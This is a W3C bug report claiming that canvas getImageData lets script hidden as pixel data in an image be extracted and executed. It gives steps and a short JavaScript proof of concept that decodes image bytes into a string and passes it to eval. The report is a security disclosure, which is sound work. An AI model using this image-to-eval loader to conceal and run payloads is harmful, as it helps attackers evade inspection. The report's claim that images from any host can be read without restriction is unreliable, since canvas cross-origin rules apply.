https://www.w3.org/Bugs/Public/show_bug.cgi?id=20034
Bug ID: 20034
Summary: canvas getImageData opens security hole for code
Classification: Unclassified
Product: HTML WG
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: critical
Priority: P2
Component: HTML Canvas 2D Context
Assignee: jaymunro@microsoft.com
Reporter: bertram@n-bis.de
QA Contact: public-html-bugzilla@w3.org
CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,
public-html@w3.org
Created attachment 1249
--> https://www.w3.org/Bugs/Public/attachment.cgi?id=1249&action=edit
sample image and html page
With the canvas it is possible to read byte data out of an image.
Images themselves can come from different URLs (hosts) without restriction.
What happens when someone fills an image with code values as pixel data, loads
the image into a canvas and interprets it?
He could execute code without any knowledge of any security prevention, because
the "code" is an image.
What I've done is simple:
1. Create an image where the pixels are the colour representation of
window['alert']('xss')
This could be a GIF, PNG, ... It depends on the colour interpolation in the
resulting image.
2. Load the image into a web page.
3. Create a canvas object and put the image inside.
4. Read the byte data of the canvas and cast it as a string to eval.
Et voilà.
This is the small JS for it:
var img = new Image();
img.onload = function () {
    // Draw the loaded image onto a canvas of the same size.
    var ca = document.createElement('canvas');
    ca.width = this.width;
    ca.height = this.height;
    var ctx = ca.getContext('2d');
    ctx.drawImage(this, 0, 0);
    // Read the raw RGBA bytes back and turn every byte below 255 into a character.
    var a = "", d = ctx.getImageData(0, 0, this.width, this.height).data;
    for (var i = 0; i < d.length; i++) {
        if (d[i] < 255) a += String.fromCharCode(d[i]);
    }
    // Evaluate the recovered string as script.
    eval(a);
};
img.src = "exploid.gif";